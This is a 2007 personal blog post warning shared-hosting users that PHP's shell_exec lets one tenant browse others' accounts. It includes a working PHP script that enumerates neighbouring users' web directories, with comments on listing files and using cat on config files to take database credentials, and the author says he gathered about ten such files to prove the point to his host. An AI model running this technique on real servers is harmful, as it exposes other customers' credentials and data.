Shared Hosting Woes

Posted by Matt Johnson | 2007-06-01 17:05:59

I'm on a shared hosting account over at...well, I better not say. I learned about the shell_exec function in PHP a few days ago. If your host allows you to run that function, you'd better ask them to disable it. Anyone who knows your account username on the shared server can checkout all your files. Take a look at this script:

<?php // Array of some of the sites on your server from a reverse IP tool $site[0] = 'example.com'; $site[1] = 'example.net'; $site[2] = 'example.org'; $site[3] = 'google.com'; $site[4] = 'yahoo.com'; /* For each item in the array, you take out the dot, then take the first eight characters in the domain name and assign it to $current_site. Then you run the shell_exec function to figure out which users on the server are using the default username. */ foreach($site as $key => $value) { $current_site = str_replace(".", "", "$value"); $current_site = substr($current_site,0,8); $output = shell_exec ("cd ../../$current_site/www ; pwd"); echo "<pre>$output</pre>"; } /* Using that information you can run something like: shell_exec ("cd ../../username/www ; ls -l") find a config file and get db info from a cat */ ?>

After I reported that to my host they claimed it wouldn't do anything and didn't pose a risk. Then I sent them an email that contained about 10 configuration files with database information in them. They disabled it. The tech dude didn't even thank me. Oh well, I'm getting off them and moving to a dedi pretty soon.

• About
• Portfolio
• Tools
• Résumé
• Blog
• Links

---

© 2008 Matt Johnson Web Development